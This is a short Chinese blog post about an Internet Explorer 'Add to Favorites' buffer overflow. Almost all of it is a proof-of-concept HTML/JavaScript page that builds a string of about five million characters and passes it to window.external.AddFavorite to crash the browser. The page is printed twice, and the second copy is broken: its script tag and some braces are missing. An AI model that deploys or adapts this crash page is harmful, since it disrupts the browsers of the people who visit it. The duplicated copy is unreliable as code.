IE添加收藏缓冲区溢出

2009年7月10日 | 标签: ie, 微软, 溢出

Sberry, Compaq

<code>
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
function go()
{
    var str =unescape('%u4141');
    var finalstr = createInlineBuffer(str, 5150000);
    var len = finalstr.length;
    document.write(len);
    addfav(finalstr);
}

/* Effient in-line creation */
function createInlineBuffer (str, num) {
    var    i = Math.ceil(Math.log(num) / Math.LN2),
        res = str;
    do {
        res += res;
    } while (0 < --i);
    return res.slice(0, str.length * num);
}

/* Vulnerable Function */
function addfav(str)
   {
   if (document.all)
      {
      window.external.AddFavorite
      ('http://'+str,'Crash')
      }
   }
</script>
</head>
<body>
<a href="javascript:go()">Add To Favorites</a>
</body>
</html>
</code>

<code>

<html>

<head>

function go()

{

var str =unescape('%u4141');

var finalstr = createInlineBuffer(str, 5150000);

var len = finalstr.length;

document.write(len);

addfav(finalstr);

}

/* Effient in-line creation */

function createInlineBuffer (str, num) {

var i = Math.ceil(Math.log(num) / Math.LN2),

res = str;

do {

res += res;

} while (0 < --i);

return res.slice(0, str.length * num);

}

/* Vulnerable Function */

function addfav(str)

{

if (document.all)

{

window.external.AddFavorite

('http://'+str,'Crash')

}

</script>

</head>

<body>

<a href="javascript:go()">Add To Favorites</a>

</body>

</html>

</code>

发表评论 | Trackback

目前还没有任何评论.

« 微软MPEG-2的分析报告 Sun One WebServer 6.1 JSP Source Viewing vulnerability »

置顶

SpookZanG

IE添加收藏缓冲区溢出

分类目录

链接表

文章归档

标签

功能